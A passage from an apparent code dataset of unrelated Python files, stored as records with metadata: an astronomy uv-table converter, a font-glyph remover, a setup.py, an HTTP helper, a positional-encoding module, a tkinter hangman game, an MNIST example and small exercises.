sys.exit()\n\n\n# \n# check uvt_names\nif len(uvt_names) > 1:\n print('Error! Please input only one uv table!')\n sys.exit(255)\n\n\n# \n# loop the input uvtables\nglobal_data_dict = OrderedDict()\nglobal_data_dict['ivis'] = []\n#global_data_dict['ichan'] = []\n#global_data_dict['istokes'] = []\nglobal_data_dict['u'] = []\nglobal_data_dict['v'] = []\nglobal_data_dict['w'] = []\nglobal_data_dict['re'] = []\nglobal_data_dict['im'] = []\nglobal_data_dict['wt'] = []\nglobal_data_dict['amp'] = []\n#global_data_dict['date'] = [] # if output date mjd and time then uncomment this line\n#global_data_dict['time'] = [] # if output date mjd and time then uncomment this line\nfor i_uvt in range(len(uvt_names)):\n uvt_name = uvt_names[i_uvt]\n uvt_type = 'none'\n # \n # check suffix\n if re.match(r'(.*?)\\.uvt', uvt_name, re.IGNORECASE):\n uvt_name = re.sub(r'(.*?)\\.uvt', r'\\1', uvt_name, re.IGNORECASE)\n uvt_type = 'uvt'\n elif re.match(r'(.*?)\\.uvfits', uvt_name, re.IGNORECASE):\n uvt_name = re.sub(r'(.*?)\\.uvfits', r'\\1', uvt_name, re.IGNORECASE)\n uvt_type = 'uvfits'\n else:\n print('Error! The input data is neither uvtable nor uvfits! Please check the input file type, make sure the suffix is either *.uvt or *.uvfits!')\n sys.exit()\n # \n # convert uvt to uvfits\n if uvt_type == 'uvt':\n # check existing file\n if os.path.isfile(out_name+'.uvfits'):\n print('Found existing \"{0}.uvfits\"! Backup it as \"{0}.uvfits.backup\"!'.format(out_name))\n shutil.move(out_name+'.uvfits', out_name+'.uvfits.backup')\n # run gildas/mapping\n print('Running: echo \"fits {0}.uvfits from {0}.uvt /style casa\" | mapping -nw -nl > {0}.uvfits.stdout.txt'.format(uvt_name))\n os.system('echo \"fits {0}.uvfits from {0}.uvt /style casa\" | mapping -nw -nl > {0}.uvfits.stdout.txt'.format(uvt_name))\n if not os.path.isfile(uvt_name+'.uvfits'):\n print('Error! Failed to call GILDAS/mapping to convert \"{0}.uvt\" to \"{0}.uvfits\"!'.format(uvt_name))\n sys.exit()\n # \n # read uvfits \n print('Reading '+uvt_name+'.uvfits')\n hdu = fits.open(uvt_name+'.uvfits')\n if type(hdu[0]) != fits.GroupsHDU:\n print('Error! The uvfits file \"{0}.uvfits\" is not fits.GroupsHDU type!'.format(uvt_name))\n sys.exit()\n tb = hdu[0]\n print(tb.columns)\n #print(len(tb.data))\n #print(tb.data.shape)\n #print(len(tb.data[0]))\n #print(tb.data[0]['DATA'].shape)\n #print(type(tb.data[0]['DATA']))\n #print(type(tb.data))\n #tb.data.sort(order=['UU','VV','WW'])\n # \n # read data array \n data_array = tb.data['DATA']\n print('DATA shape', data_array.shape)\n #print(tb.data['DATE'][0])\n #print(tb.data['DATE'][1])\n #print(tb.data['_DATE'][0])\n #print(tb.data['_DATE'][1])\n #print(tb.data['FREQSEL'][0])\n #print(tb.data['FREQSEL'][1])\n n_visi = data_array.shape[0]\n n_chan = data_array.shape[4]\n n_stokes = data_array.shape[5]\n # \n x_vis = np.linspace(1, n_visi, num=n_visi, endpoint=True, dtype=np.int32)\n global_data_dict['ivis'].extend(x_vis.flatten().tolist())\n global_data_dict['u'].extend((tb.data['UU'] * const.c.to('m/s').value).flatten().tolist())\n global_data_dict['v'].extend((tb.data['VV'] * const.c.to('m/s').value).flatten().tolist())\n global_data_dict['w'].extend((tb.data['WW'] * const.c.to('m/s').value).flatten().tolist())\n # \n # if the uv table has only one channel and one stokes, then we also output re im wt amp\n if n_chan == 1 and n_stokes == 1:\n global_data_dict['re'].extend(tb.data['DATA'].flatten().tolist()[0::3])\n global_data_dict['im'].extend(tb.data['DATA'].flatten().tolist()[1::3])\n global_data_dict['wt'].extend(tb.data['DATA'].flatten().tolist()[2::3])\n global_data_dict['amp'].extend(np.sqrt(np.array(global_data_dict['re'])**2 + np.array(global_data_dict['im'])**2).tolist())\n #global_data_dict['date'].extend((tb.data['DATE']).flatten().tolist()) # if output date mjd and time then uncomment this line\n #global_data_dict['time'].extend((tb.data['_DATE']).flatten().tolist()) # if output date mjd and time then uncomment this line\n \n # \n # check whether to keep rows where re, im, wt are all zeros\n if not keep_zeros:\n mask_zeros = np.logical_and.reduce((np.isclose(global_data_dict['re'], 0.0), np.isclose(global_data_dict['im'], 0.0), np.isclose(global_data_dict['wt'], 0.0)))\n count_zeros = np.count_nonzero(mask_zeros)\n if count_zeros > 0:\n print('Removing %d rows where re, im, wt are all zeros'%(count_zeros))\n for key in global_data_dict:\n global_data_dict[key] = np.array(global_data_dict[key])[~mask_zeros]\n\n\n#for i in ['ivis', 'ichan', 'istokes', 'u', 'v', 'w', 're', 'im', 'wt', 'amp', 'date', 'time']:\nfor i in ['ivis']:\n print('len(global_data_dict[%s]) = %d'%(i, len(global_data_dict[i])))\nkeys = list(global_data_dict.keys())\nfor key in keys:\n if len(global_data_dict[key]) == 0:\n del global_data_dict[key]\ntbout = Table(global_data_dict)\ntbout['u'].format = '%0.3f'\ntbout['v'].format = '%0.3f'\ntbout['w'].format = '%0.3f'\nif 'amp' in global_data_dict:\n tbout['re'].format = '%0.3E'\n tbout['im'].format = '%0.3E'\n tbout['wt'].format = '%0.3E'\n tbout['amp'].format = '%0.3E'\n\nregex_pattern = re.compile(r'^(.+)\\.(fits|txt|csv)$')\nif regex_pattern.match(out_name):\n out_base = regex_pattern.sub(r'\\1', out_name)\n out_type = regex_pattern.sub(r'\\2', out_name)\nelse:\n out_base = out_name\n out_type = 'fits'\n\nprint('Writing to disk')\nif out_type.lower() == 'txt':\n out_format = 'ascii.fixed_width'\n tbout.write(out_base+'.'+out_type, format=out_format, delimiter=' ', bookend=True, overwrite=True)\n with open(out_base+'.'+out_type, 'r+') as fp:\n fp.seek(0)\n fp.write('#')\nelse:\n out_format = out_type.lower()\n tbout.write(out_base+'.'+out_type, format=out_format, overwrite=True)\n\nprint('Output to \"%s\"!'%(out_base+'.'+out_type))\n\n\n\n\n\n","sub_path":"bin/pdbi-uvt-raw-uvtable-print-u-v-w.py","file_name":"pdbi-uvt-raw-uvtable-print-u-v-w.py","file_ext":"py","file_size_in_byte":8541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"305145565","text":"from vanilla.dialogs import *\n\n# copy-paste to fill this list with whatever glyphs fontMake flags as not being interpolatable\nglyphsToDelete = ['divide', 'plusminus']\n\n# help(CurrentFont().removeGlyph())\n\ninputFonts = getFile(\"select masters for var font\", allowsMultipleSelection=True, fileTypes=[\"ufo\"])\n\nfor fontPath in inputFonts:\n f = OpenFont(fontPath, showUI=False)\n # # open the fonts, then:\n for glyphName in glyphsToDelete:\n print(glyphName)\n if glyphName in f.glyphOrder:\n f.removeGlyph(glyphName)\n f.save()\n f.close()\n\n","sub_path":"remove-list-of-glyphs.py","file_name":"remove-list-of-glyphs.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"155554780","text":"from setuptools import setup, find_packages\n\nbase_packages = [\n \"numpy>=1.16.0\",\n \"scipy>=1.2.0\",\n \"scikit-learn>=0.20.2\",\n \"umap-learn>=0.3.10\",\n \"altair>=4.0.1\",\n \"matplotlib>=3.2.0\",\n \"spacy>=2.2.3\",\n \"networkx>=2.4\",\n \"sense2vec>=1.0.2\",\n \"fasttext>=0.9.1\"\n]\n\ndocs_packages = [\n \"mkdocs==1.1\",\n \"mkdocs-material==4.6.3\",\n \"mkdocstrings==0.8.0\",\n \"jupyterlab>=0.35.4\",\n \"nbstripout>=0.3.7\",\n \"nbval>=0.9.5\",\n]\n\ntest_packages = [\n \"flake8>=3.6.0\",\n \"nbval>=0.9.1\",\n \"pytest>=4.0.2\",\n \"black>=19.3b0\",\n \"pytest-cov>=2.6.1\",\n \"nbval>=0.9.5\",\n \"pre-commit>=2.2.0\"\n]\n\ndev_packages = docs_packages + test_packages\n\nsetup(\n name='whatlies',\n version=\"0.2.7\",\n author=\"Vincent D. Warmerdam\",\n packages=find_packages(exclude=['notebooks', 'docs']),\n description=\"Make visualisations to learn `what lies` in word embeddings.\",\n install_requires=base_packages,\n extras_require={\"docs\": docs_packages, \"dev\": dev_packages, \"test\": test_packages},\n classifiers=[\n \"Intended Audience :: Science/Research\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n \"License :: OSI Approved :: MIT License\",\n \"Topic :: Scientific/Engineering\",\n \"Topic :: Scientific/Engineering :: Artificial Intelligence\",\n ],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"6423028","text":"import logging\nimport requests\n\nfrom .user_agent import get_user_agent_header\n\nLOG = logging.getLogger(__name__)\n\n\ndef handle_request(http_method, url, headers=None, **kwargs):\n all_headers = _combine_dicts(get_user_agent_header(), headers)\n parameters = _combine_dicts(\n {'timeout': 30}, kwargs)\n\n LOG.debug('HTTP {} {} headers={} params={}'.format(\n http_method, url, all_headers, parameters))\n\n response = requests.request(http_method, url, headers=all_headers,\n **parameters)\n response.raise_for_status()\n\n LOG.info('HTTP {} completed in {}s to {}'.format(\n response.request.method,\n response.elapsed.total_seconds(),\n response.request.url))\n\n return response\n\n\ndef _combine_dicts(main_dict, extra_dict_or_none):\n if extra_dict_or_none:\n assert isinstance(extra_dict_or_none, dict)\n main_dict.update(extra_dict_or_none)\n return main_dict\n","sub_path":"measurement_collector/downloaders/handle_request.py","file_name":"handle_request.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"500912934","text":"import math\n\nimport torch\nfrom torch import nn\n\n\nclass PositionalEncoding(nn.Module):\n \"Implement the PE function.\"\n\n def __init__(self, d_model, dropout, max_shape):\n # if large input is (b, dm1, dm2, ..., dmn)\n # max_shape should (dm1, dm2, ..., dmn)\n super(PositionalEncoding, self).__init__()\n self.dropout = nn.Dropout(p=dropout)\n # add batch dim and channel dim\n self.register_buffer('signal',\n self.position_encoding_nd(torch.zeros([1, *max_shape, d_model], dtype=torch.float)))\n # self.signal =\n self.linear = nn.Linear(2 * d_model, d_model)\n\n def forward(self, x):\n x = torch.cat((x, self.get_signal_like(x)), dim=-1)\n return self.linear(x)\n\n def get_signal_like(self, x):\n shape = [1, *x.shape[1:]]\n repeat = [x.shape[0]] + [1 for _ in x.shape[1:]]\n index = [slice(0, int(s)) for s in shape]\n signal: torch.Tensor = self.signal[index]\n return signal.repeat(repeat)\n\n def position_encoding_nd(self, x: torch.Tensor, min_timescale=1.0, max_timescale=1.0e4):\n \"\"\"\n 此处从tensor2tensor源码修改而来\n \"\"\"\n input_shape = x.shape\n num_dims = len(input_shape) - 2\n channels = input_shape[-1]\n # 计算每一个位置维度在channel维度上能占用多长, ��意此处计算的值是可占用长度的一半\n num_timescales = int(channels // (num_dims * 2))\n # 计算三角函数中的角速度参量\n log_timescale_increment = (\n math.log(float(max_timescale) / float(min_timescale)) /\n (float(num_timescales) - 1))\n # 生成要用于三角函数的时间序列 (1, num_timescales)\n inv_timescales = min_timescale * torch.exp(\n torch.arange(0, num_timescales, dtype=torch.float, device=x.device) * -log_timescale_increment\n ).unsqueeze(0)\n output = x.clone()\n for dim in range(num_dims):\n # 计算当前待编码维度的长度, 生成要用于三角函数的位置序列 (len, 1)\n length = input_shape[dim + 1]\n position = torch.arange(0, length, dtype=torch.float, device=x.device)\n # 计算得到当前维度的角度编码块,之后用于三角函数 (len, num_timescales)\n scaled_time = position.unsqueeze(1).mm(inv_timescales)\n\n # 在position矩阵前需要补齐的通道数\n prepad_channel_nam = dim * 2 * num_timescales\n prepad = torch.zeros((scaled_time.shape[0], prepad_channel_nam), device=x.device)\n # 在position矩阵后需要补齐的通道数\n postpad_channel_nam = channels - (dim + 1) * 2 * num_timescales\n postpad = torch.zeros((scaled_time.shape[0], postpad_channel_nam), device=x.device)\n # 补齐至与输入相同的通道数,\n # (len, prepad_channel_nam + num_timescales + num_timescales + postpad_channel_nam) = (len, dmodel)\n # 注意:prepad_channel_nam + num_timescales + num_timescales + postpad_channel_nam = dmodel\n signal = torch.cat([prepad, torch.sin(scaled_time), torch.cos(scaled_time), postpad], dim=1)\n # 补齐维度 (1, 1, ..., len, dmodel)\n for _ in range(1 + dim):\n signal = signal.unsqueeze(0)\n # 补齐维度 (1, 1, ..., len, 1, 1, ..., dmodel)\n for _ in range(num_dims - 1 - dim):\n signal = signal.unsqueeze(-2)\n # 与x相加, 长度为1的维度会被自动广播\n output = output + signal\n return output\n","sub_path":"code/model/ContextEncoder/positional_encoding.py","file_name":"positional_encoding.py","file_ext":"py","file_size_in_byte":3630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"417143344","text":"#Hangman program with GUI\n#Trying out documentation for class\n\n#Features:\n# Display a few letters of the hidden word. Number depends on length of word OK\n# Hidden letters are replaced with underscore. OK\n# Actual hangman being drawn. OK\n# GameOver once hangman drawing is completed. OK\n# New game when words are guessed correctly. OK\n# A library of many words to choose from. **Can use txt file to compile lists of words.\n# Difficulty levels, easy and hard.\n\n\ntry:\n import tkinter\n\nexcept ImportError:\n import Tkinter as tkinter #For python2\n\nimport random\n\n#Class and functions\nclass hangMan(object):\n\n '''This class encompasses the whole hang man game. Each instances will be a hangman game.\n\n Attributes:\n __mode (str) : the mode of the game\n __randomWord (str) : The random word chosen from __wordList\n __wrongCounter (str) : The counter to determine when will the game be over\n __checkList (str) : A list that updates when user key in the correct letter.\n Will be used to check if the user have correctly typed out the correct word.\n __wordDict (dict) : A dictionary containing keys which indicates category.\n Under each key(category), there will be a set of words which fufils the category.\n The key will be used as hints.\n\n Methods:\n start(self) : To start the game.\n _randomWordGen(self) : From __wordList, pick a random word from a random category.\n Chosen word will be __randomWord.\n\n _displayHidWord(self, randomWord (str)) : Displays the argument, randomWord, on the game screen, hidden with '_'.\n Depending on the length of randomWord, different number of letters of randomWord will be revealed.\n\n inputChecker(self, letter (str)) : Takes in the arguement, letter, and check if\n the argument is the correct letter of the __randomWord.\n It will handle the outcome of getting the right and wrong letters.\n '''\n\n\n\n def __init__(self,mode):\n self.__mode = mode\n self.__randomWord = ''\n self.__wrongCounter = 0\n self.__checkList = []\n self.__wordDict = {'Animals':{'ELEPHANT','BIRD','DOG','DINOSAUR','BEAR','MONKEY'},\n 'Vehicles':{'PLANE','CAR','TRUCK','MOTORBIKE','BOAT','TRAIN'},\n }\n\n\n #Random word generator\n def _randomWordGen(self):\n\n #random.choice work with index. Therefore, a list of keys is needed.\n #Choose a random key(category).\n randomCat = random.choice(list(self.__wordDict))\n #Display hint.\n category.set('hint : ' + randomCat)\n\n #Storing the random word choosing the the category.\n self.__randomWord = random.choice(list(self.__wordDict[randomCat]))\n\n #Pass the chosen word to display appropriately on screen.\n self._displayHidWord(self.__randomWord)\n\n #Display the chosen word as '_'. Revealing only some\n def _displayHidWord(self, randomWord):\n '''Args:\n randomWord (str) : The string of the random chosen word to be hidden and displayed on the game screen.\n\n Functions:\n reveal (numToReveal (int)) : Decides how many letters of the chosen word to reveal.\n\n '''\n\n\n #Function to decide how many letters to reveal\n def reveal(numToReveal):\n '''Args:\n numToReveal (int) : Indicates how many letters of the chosen word to reveal.\n '''\n\n #sample returns a list of number(To be used as indexes).\n #To decide which index of the chosen word to reveal.\n #Second argument of sample indicates how many samples to collect.\n ranIndex = random.sample(range(0,len(randomWord)),numToReveal)\n\n #Using index to link display and the chosen word.\n for i in range(0,len(randomWord)):\n\n #If index number is in the sample, reveal the letter.\n if i in ranIndex:\n listOfDisplay[i].set(randomWord[i])\n #Add to check list.\n self.__checkList.append(randomWord[i])\n #If now chosen to be revealed, hide the letter with '_'.\n else:\n listOfDisplay[i].set('_')\n #Add to check list.\n self.__checkList.append('_')\n\n #NOTE THAT SINCE LETTERS ARE LITERATED IN INDEX ORDER, CHECKLIST WILL BE APPENDED IN\n # ORDER AS WELL\n # What is displayed on the game screen will be the same as what is in the list.\n\n #reveal function in use.\n #Depending on the length of the random word, reveal different number of letters.\n #The difficulty level function can be added here. but im lazy lols.\n length = len(randomWord)\n\n if self.__mode == 'easy':\n\n if length <= 4:\n reveal(2)\n\n if 5 <= length <= 6:\n reveal(3)\n\n if length == 7:\n reveal(4)\n\n if length == 8:\n reveal(5)\n\n if length > 8:\n reveal(6)\n\n elif self.__mode == 'hard':\n\n if length <= 4:\n reveal(1)\n\n if 5 <= length <= 6:\n reveal(2)\n\n if length == 7:\n reveal(2)\n\n if length == 8:\n reveal(3)\n\n if length > 8:\n reveal(4)\n\n #Starts the game by calling the function that generates random words.\n def start(self):\n self._randomWordGen()\n\n\n\n\n\n #Keying in alphabets.\n def inputChecker(self, letter):\n '''Args:\n letter (str) : The argument is the letter that is linked to each button.\n Using the letter, the function will check and decide the outcome of the game.\n Functions:\n newGame : Restarts the game after game is over, win or lose.\n gameOver : Indicates game over.\n wrongLetter (count(int)) : Keep tracks of the number of chances left\n and draws the hang man stroke by stroke.\n '''\n\n def newGame():\n\n #Making sure these variables are global, otherwise, other functions\n # that need these variables will be unable to access it.\n global GTWLabel\n global category\n global hint\n global letterFrame\n global hangManCanvas\n global newGameButton\n\n\n #Destroy new game button after clicking on the button\n newGameButton.destroy()\n\n #Reset counters and checklist\n self.__wrongCounter = 0\n self.__checkList = []\n\n #clear hidword display(max 10 letters)\n for i in range(0,10):\n listOfDisplay[i].set('')\n\n #clear dead hangman drawing.\n hangManCanvas.destroy()\n\n #Label 'guess the word' display again.\n GTWLabel = tkinter.Label(wordFrame,background='black', foreground='white', text='Guess the word!')\n GTWLabel.grid(row=0,column=0,sticky='ew')\n\n #Hint label again.\n category = tkinter.StringVar()\n hint = tkinter.Label(wordFrame, background='black', foreground='white', textvariable=category)\n hint.grid(row=1,column=0,sticky='ew')\n\n #Frame and buttons for the letters A to Z again.\n letterFrame = tkinter.Frame(wordFrame, background='black')\n letterFrame.grid(row=3,column=0,sticky='nsew')\n #Cannot use for row in range(0,5) as the number will only go to the next one\n # when the list is completely iterated.\n # ie. row will be 0 until the buttons for last letterSet is created.\n # resulting in the last letterSet being on row 0.\n #This will continue to the range, resulting in everyrow being the last letterSet only.\n\n row=0\n for letterSet in alphabets:\n column = 0\n for letter in letterSet:\n tkinter.Button(letterFrame, background ='black', foreground='white', width=4, text=letter, command=lambda letter=letter: hMGame.inputChecker(letter)).grid(row=row,column=column,stick='nsew')\n column += 1\n row +=1\n\n #Recreate hangman canvas\n hangManCanvas = tkinter.Canvas(hangManFrame, background='gray')\n hangManCanvas.grid(row=0,column=0,sticky='nsew')\n # (0,0) starts from the top left corner, everything within the canvas is postive.\n #create_line or create_oval has the coordinates argument format\n # (fromX,fromY,toX,toY)\n\n #Kick start the game.\n hMGame.start()\n\n\n def gameOver():\n #making newGameButton a global variable as it is needed by all the functions\n # in inputchecker.\n global newGameButton\n\n #Destroy all buttons, clear hint display and 'guess the word'.\n letterFrame.destroy()\n GTWLabel.destroy()\n hint.destroy()\n\n\n #Replace the chosen word display with game over.\n gameOverTxt = 'GAME OVER '\n\n for i in range(0,len(gameOverTxt)):\n listOfDisplay[i].set(gameOverTxt[i])\n\n #Create new game button.\n newGameButton = tkinter.Button(mainWindow, background ='black', foreground='white',text='New game',command=newGame)\n newGameButton.grid(row=1,column=0,sticky='nsew')\n\n\n\n\n def wrongLetter(count):\n #Hang man drawing, stroke by stroke, as wrong count increase.\n #support poles\n if count == 0:\n hangManCanvas.create_line(20,20,150,20,fill='white',width=6)\n\n elif count == 1:\n hangManCanvas.create_line(130,20,130,270,fill='white',width=6)\n\n #Rope\n elif count == 2:\n hangManCanvas.create_line(75,16,75,100,fill='brown', width=3)\n #head\n elif count == 3:\n hangManCanvas.create_oval(30,70,80,120,outline='white',fill='white',width=2)\n\n #torso and neck\n elif count == 4:\n hangManCanvas.create_line(70,120,80,112,fill='brown',width=7)\n hangManCanvas.create_line(75,123,75,180,fill='white',width=4)\n\n #arms\n elif count == 5:\n hangManCanvas.create_line(75,120,80,160,fill='white',width=4)\n\n elif count == 6:\n hangManCanvas.create_line(75,120,65,160,fill='white',width=4)\n\n #legs\n elif count == 7:\n hangManCanvas.create_line(75,180,65,240,fill='white',width=4)\n\n elif count == 8:\n hangManCanvas.create_line(75,180,85,240,fill='white',width=4)\n gameOver()\n\n #Under inputChecker\n #Updates the chosen word display letter by letter if the letter clicked by player is correct.\n #Comparing by repeated iteration for each letter clicked to allow\n #repeated letters to be updated. ie. MOON has 2 'O's. Using .find will only\n #result in the index of the first O to be returned, hence, the second O will\n #never be updated and the game will never end.\n for i in range(0,len(self.__randomWord)):\n #If letter clicked = letter of chosen Word in position i, update the display and checklist.\n if letter == self.__randomWord[i]:\n listOfDisplay[i].set(letter)\n self.__checkList[i] = letter\n\n #To see how the checklist updates as the game go on.\n print(self.__checkList)\n\n #Converts the chosen word into a list and compare it to the check list.\n #If both has the same value, The game will end and user will win.\n if list(self.__randomWord) == self.__checkList:\n\n global newGameButton\n\n letterFrame.destroy()\n GTWLabel.destroy()\n hint.destroy()\n\n winGameTxt = 'CONGRATZ!!'\n\n for i in range(0,len(winGameTxt)):\n listOfDisplay[i].set(winGameTxt[i])\n\n newGameButton = tkinter.Button(mainWindow, background ='black', foreground='white',text='New game',command=newGame)\n newGameButton.grid(row=1,column=0,sticky='nsew')\n\n\n #If letter clicked do not exist in the chosen word, draw the hangman and update wrong counter.\n if letter not in self.__randomWord:\n wrongLetter(self.__wrongCounter)\n self.__wrongCounter += 1\n\n\n\n\nif __name__ == '__main__':\n #The main window\n mainWindow = tkinter.Tk()\n mainWindow.title('Hangman')\n mainWindow.geometry('420x420+200+200')\n\n #Frame for the letter selections and words display.\n wordFrame = tkinter.Frame(mainWindow,background='black',relief='raised')\n wordFrame.grid(row=0,column=0,sticky='nswe')\n\n #Label 'guess the word' display.\n GTWLabel = tkinter.Label(wordFrame,background='black', foreground='white', text='Guess the word!')\n GTWLabel.grid(row=0,column=0,sticky='ew')\n\n #Hint label\n category = tkinter.StringVar()\n hint = tkinter.Label(wordFrame, background='black', foreground='white', textvariable=category)\n hint.grid(row=1,column=0,sticky='ew')\n\n\n\n #Frame and text for hiddenword display.\n hidWordFrame = tkinter.Frame(wordFrame, background='black', relief='sunken',borderwidth=10)\n hidWordFrame.grid(row=2, column=0,sticky='ew')\n\n\n #A way to produce many different displays will different tkinter.StringVar()\n #Assigning each key as number, in order of index, will link the position of each display to the position of each letter in the chosen word.\n # Since indexes progresses similarly, ie. 0,1,2,3,4....\n listOfDisplay = dict()\n for i in range(0,10):\n listOfDisplay[i] = tkinter.StringVar()\n #Each button will get its text from different tkinter.StringVar() attached to different keys.\n hidWordLabel = tkinter.Label(hidWordFrame, background='black', foreground='white', textvariable=listOfDisplay[i])\n #The labels will be created will left to right, with it getting its text from tkinter.StringVar()\n # that is attached to a number(acting as the index of the display)\n #It is like each display perfectly corresponds to each position of an iterable.\n hidWordLabel.grid(row=0,column=i,stick='nwes')\n #This implies that you can set the value of the label at a specific position that you want.\n\n\n\n\n #Frame and buttons for the letters A to Z\n letterFrame = tkinter.Frame(wordFrame, background='black')\n letterFrame.grid(row=3,column=0,sticky='nsew')\n\n alphabets = [('A','B','C','D','E'),('F','G','H','I','J'),('K','L','M','N','O'),\n ('P','Q','R','S','T'),('U','V','W','X','Y','Z')]\n\n\n #Cannot use for row in range(0,5) as the number will only go to the next one\n # when the list is completely iterated.\n # ie. row will be 0 until the buttons for last letterSet is created.\n # resulting in the last letterSet being on row 0.\n #This will continue to the range, resulting in everyrow being the last letterSet only.\n\n row=0\n for letterSet in alphabets:\n column = 0\n for letter in letterSet:\n #Lambda is like anon function in javascript.\n #Each letter iterated will be assigned to a default argument of the lambda expression.\n # and each button will have the lambda expression with different letter as its default argument.\n tkinter.Button(letterFrame, background ='black', foreground='white', width=4, text=letter, command=lambda buttonLetter=letter: hMGame.inputChecker(buttonLetter)).grid(row=row,column=column,stick='nsew')\n column += 1\n row +=1\n\n\n #Frame and canvas for hangman drawing.\n hangManFrame = tkinter.Frame(mainWindow)\n hangManFrame.grid(row=0,column=1,sticky='nsew')\n\n hangManCanvas = tkinter.Canvas(hangManFrame, background='gray')\n hangManCanvas.grid(row=0,column=0,sticky='nsew')\n # (0,0) starts from the top left corner, everything within the canvas is postive.\n #create_line or create_oval has the coordinates argument format\n # (fromX,fromY,toX,toY)\n\n\n\n #Initial launch of the game.\n hMGame = hangMan('hard')\n hMGame.start()\n\n mainWindow.mainloop()\n\n\n","sub_path":"Hangman/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":16723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"201544090","text":"from tkinter import *\n\nclass MyCanvasClass(Canvas):\n \"\"\" A GUI class \"\"\"\n \n def __init__(self, master):\n \"\"\" Initialize the frame \"\"\"\n Canvas.__init__(self, master)\n self.pack()\n self.draw_canvas()\n\n def draw_canvas(self):\n for x in range(0,400,25):\n for y in range(0,200,25):\n self.create_rectangle(x, y, x+25, y+25, fill=\"lightblue\")\n self.create_line(0, 0, 400, 200)\n self.create_line(0, 100, 400, 0, fill=\"red\", dash=(4, 4))\n \n## -------------------------------------------------------\n \nroot = Tk()\nroot.title(\"Demo TKinter Canvas\")\nroot.geometry(\"300x200+100+100\")\n\nwindow = MyCanvasClass(root)\n\nroot.mainloop()\n","sub_path":"tkinter_canvas.py","file_name":"tkinter_canvas.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"555808590","text":"import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\n#载入数据集,直接填写MNIST_data,会放到当前目录下。执行这条语句会去网上找\nmnist = input_data.read_data_sets(\"MNIST_data\", one_hot = True)\n\n#每个批次的大小,一次性放入100张图片(以矩阵形式放入)\nbatch_size = 50\n#计算一共有多少个批次\nn_batch = mnist.train.num_examples // batch_size\n\n#定义两个placeholder\nx = tf.placeholder(tf.float32,[None,784])\ny = tf.placeholder(tf.float32,[None,10])\n\n#定义中间层\nW = tf.Variable(tf.random_normal([784,20]))\nb = tf.Variable(tf.random_normal([1,20]))\nL1 = tf.nn.sigmoid(tf.matmul(x,W)+b)\n\n#定义输出层\nWeights_L2 = tf.Variable(tf.random_normal([20,10]))\nbiases_L2 = tf.Variable(tf.random_normal([1,10]))\nWx_plus_b_L2 = tf.matmul(L1,Weights_L2) + biases_L2\nprediction = tf.nn.sigmoid(Wx_plus_b_L2)\n\n#二次代价函数\nloss = tf.reduce_mean(tf.square(y-prediction))\n#使用梯度下降法\ntrain_step = tf.train.GradientDescentOptimizer(0.03).minimize(loss)\n\n#初始化变量\ninit = tf.global_variables_initializer()\n\n#正确率大小,结果存放在一个布尔型列表中。argmax中后面那个1参数,\n# axis = 0 的时候返回每一列最大值的位置索引\n# axis = 1 的时候返回每一行最大值的位置索引,argmax返回一维向量最大值所在的位置\ncorrect_prediction = tf.equal(tf.argmax(y,1),tf.argmax(prediction,1))\n#求准确率,转换类型 bool --> float32, 再求准确率\naccuracy = tf.reduce_mean(tf.cast(correct_prediction,tf.float32))\n\nwith tf.Session() as sess:\n sess.run(init)\n for epoch in range(500):\n for batch in range(n_batch):\n batch_xs,batch_ys = mnist.train.next_batch(batch_size) #数据xs,标签ys\n sess.run(train_step,feed_dict={x:batch_xs,y:batch_ys})\n\n acc = sess.run(accuracy,feed_dict={x:mnist.test.images,y:mnist.test.labels}) #将训练好的模型,喂入测试数据\n print(\"Iter\" + str(epoch) + \",Testing Accuracy \" + str(acc))","sub_path":"test/第三周/(改进)3-2MNIST数据集分类简单版本.py","file_name":"(改进)3-2MNIST数据集分类简单版本.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"217277277","text":"linha = input().split(\" \")\r\nlinha = [int(i) for i in linha]\r\nn1, n2, n3, n4 = linha\r\n\r\nhoras = 0\r\nif(n3 == 0):\r\n n3 = 24\r\n\r\nminutos = (n3*60+n4)-(n1*60+n2)\r\nif(minutos < 0):\r\n minutos = 1440 + minutos\r\n\r\nif(minutos == 0):\r\n print(\"O JOGO DUROU 24 HORA(S) E 0 MINUTO(S)\")\r\nelse:\r\n while (minutos >= 60):\r\n minutos -= 60\r\n horas += 1\r\n print(\"O JOGO DUROU\",horas,\"HORA(S) E\",minutos,\"MINUTO(S)\")","sub_path":"URI-Exercícios/URI_1047_diferente.py","file_name":"URI_1047_diferente.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"467008109","text":"import core\nimport re\n\n\ntopic = input('Введите слово: ')\n\nwords = core.get_topic_words(topic)\nprint(f'Выводить партянку из тысяч слов смысла нет, поэтому ограничимся количеством.')\nprint(f'Количество слов на странице {len(words)}')\n\nwith open('new.html', 'r', encoding='utf-8') as f:\n html = f.read()\n\nlinks = core.get_link(html)\n\nif len(links) > 10:\n cmd = input(f'Количество соседних ссылок {len(links)}. Парисинг потребует время. Оно Вам надо? Нажмите [y] что бы продолжить: ')\n if cmd != 'Y':\n exit()\n\nfor l in links:\n try:\n tmp = core.get_words_link(l)\n except:\n pass\n else:\n words += tmp\n\nprint(f'Количество слов на странице и соседних сслыках 